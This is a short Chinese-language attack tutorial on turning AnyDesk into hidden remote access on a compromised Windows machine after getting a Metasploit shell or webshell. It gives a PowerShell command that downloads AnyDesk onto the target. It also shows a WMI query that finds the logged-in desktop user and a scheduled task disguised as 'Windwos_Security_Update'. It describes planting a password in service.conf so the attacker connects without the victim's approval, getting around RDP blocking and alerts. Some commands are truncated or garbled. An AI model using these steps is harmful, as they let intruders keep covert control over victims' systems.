anydesk是类似teamviewer的远程管理软件,但是他不用安装且体积小
场景举例
- 有云锁,护卫神等禁止3389登录时
- 类似阿里云这种,登录3389会报警
- 连接内网中可以出网的windows机器
注意事项
- 启动anydesk的权限需要桌面用户权限,比如,IIS做中间件的环境中,拿到了webshell一般都
是没有桌面用户权限的,如果启动anydesk不会成功 - 启动anydesk时桌面不能被注销
- 有可能连接上去是黑屏,这个是因为该桌面用户退出远程桌面但没有注销,此时,除非能用
winlogon启动anydesk,否则没法使用屏幕
使用方法
假设获取到了目标系统的一个msf的shell
`
bash下载anydesk到一个公共目录下
(New-Object System.Net.WebClient).DownloadFile(“https://download.anydesk.com/AnyDesk.exe?_ga=2.176752485.1141763109.1599703967-925913843.1599703967","C:\Users\Public\Desktop\anydesk.exe")
确定有哪些用户正在使用桌面???
(((Get-WmiObject -Class Win32_Process -Filter ‘Name=”explorer.exe”‘).GetOwner().))
启动一个计划任务,启动的用户为上个步骤选中的用户???
schtasks /Create /TN Windwos_Security_Update /SC monthly /tr “c:.…..”
先执行一次计划任务,生成配置文件
schtasks /run /tn Windwos_Security_Update
等待几秒,等anydesk成功连接到网络,再把anydesk进程杀掉,dir看用户下面是否生成配置文件,然后再service.conf里面的添加密码(AnyDeskGetAccess)
查看anydeskID并启动anydesk
不需要到目标机器上点击接受,输入密码即可
分享一个高权限webshell下可以使用的powershell脚本
`